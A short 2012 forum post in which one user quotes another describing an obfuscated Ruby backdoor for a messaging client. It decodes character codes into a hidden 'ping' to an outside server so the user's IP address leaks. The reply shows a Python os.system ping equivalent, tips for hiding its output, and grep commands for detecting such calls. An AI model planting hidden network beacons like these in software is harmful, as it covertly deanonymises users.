Quote from: kmfkewm on September 08, 2012, 02:35 pmI just realized I was being far too complicated with my backdoor. How about this. It still depends on decrypting data and I've addressed that above.Quote from: kmfkewm on September 08, 2012, 02:35 pmOn the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun. hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`Oh, for God's sake, if that's all you want, then in Python it's this (replace localhost with the IP you want and maybe insert some hex code with the -p flag):os.system("ping -c 4 127.0.0.1")You'd want to play around with it to prevent the output printing to the screen and to make sure it worked on each OS, but otherwise that's it. Of course spotting that is easy:tar -xzvf sroppy.tar.gzcd sroppygrep ping*Or even grep os.system * to see what all the system calls are doing. In the current version there aren't any, but there will be a very small number in a future version. There is not a ping command (or any other network connection) in my code.More detail on the os module is here:http://docs.python.org/library/os.html